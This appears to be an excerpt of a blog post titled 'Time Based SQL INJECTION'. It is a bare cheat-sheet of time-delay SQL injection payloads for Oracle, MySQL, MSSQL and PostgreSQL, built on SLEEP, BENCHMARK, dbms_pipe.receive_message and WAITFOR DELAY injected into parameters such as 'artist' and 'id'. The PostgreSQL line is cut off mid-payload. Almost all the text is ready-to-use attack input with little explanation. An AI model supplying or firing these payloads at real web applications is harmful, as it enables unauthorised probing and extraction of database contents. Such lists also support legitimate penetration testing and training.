ORACLE SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual MySQL artist=2 or SLEEP(10) artist=2 || SLEEP(10) artist=2 and SLEEP(10) artist=2 and IF(1=1,SLEEP(10),SLEEP(0)) artist=1 or BENCHMARK(30000000,MD5('abcdefgh')) artist=1 || BENCHMARK(30000000,MD5('abcdefgh')) artist=1 and BENCHMARK(30000000,MD5('abcdefgh')) artist=1 and IF(1=1,BENCHMARK(30000000,MD5('abcdefgh')),SLEEP(5)) MSSQL id=0; WAITFOR DELAY '0:0:5'-- PostgreSQL TrackingId=xa...
원문링크 : Time Based SQL INJECTION
네이버 블로그
티스토리
커뮤니티